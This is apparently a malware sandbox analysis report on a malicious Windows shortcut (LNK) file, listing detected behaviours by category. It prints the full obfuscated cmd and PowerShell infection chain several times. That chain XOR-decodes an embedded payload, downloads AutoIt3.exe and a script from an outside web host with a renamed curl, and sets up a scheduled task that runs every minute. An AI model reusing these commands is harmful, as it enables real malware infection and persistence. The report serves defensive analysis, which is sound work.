Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

Source: GSlLzFnTov.exe.1.dr

Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00007FF7C13D0566 push esi; retf

3_2_00007FF7C13D0567

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Windows\System32\cmd.exe

File created: C:\GSlLzFnTov\GSlLzFnTov.exe

Jump to dropped file

Boot Survival

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 